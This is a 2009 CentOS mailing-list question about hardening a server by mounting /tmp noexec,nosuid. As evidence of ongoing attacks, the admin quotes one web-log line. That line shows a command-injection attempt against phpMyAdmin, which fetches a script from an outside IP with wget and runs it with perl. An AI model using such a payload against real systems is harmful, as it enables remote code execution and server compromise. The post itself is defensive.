[CentOS] Mounting /tmp nosuid,noexec

Mon Aug 24 13:04:50 UTC 2009
Chuck <chuck.carson at gmail.com>

Does mounting /tmp as noexec,nosuid break anything in CentOS 5? I've been in
solaris land forever and a day and this is a pretty standard security
measure. I noticed CentOS comes default mounting /tmp with both those
options allowed.. I'm getting constant php hack attacks against (mostly
script kiddie level stuff right now) my server and will rest much easier
with this setting in place.. We've been evaluating numerous wiki products
which are certain to have security holes as well as pypmyadmin... Seeing a
lot of crap like this:

193.253.240.85 - - [23/Aug/2009:16:57:57 -0500] "GET
/phpmyadmin/config/config.inc.php?c=cd%20/tmp;rm%20-rf%20font-nix;wget%2078.46.33.52/font-nix;perl%20font-nix
HTTP/1.1" 404 230

(of course I use cryptic names for my phpmyadmin install directory as well
as password protect the directory and make any sensitive config files
readable only by the web server owner)

Thx for any info
rhugga
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.centos.org/pipermail/centos/attachments/20090824/1307bf98/attachment-0004.html>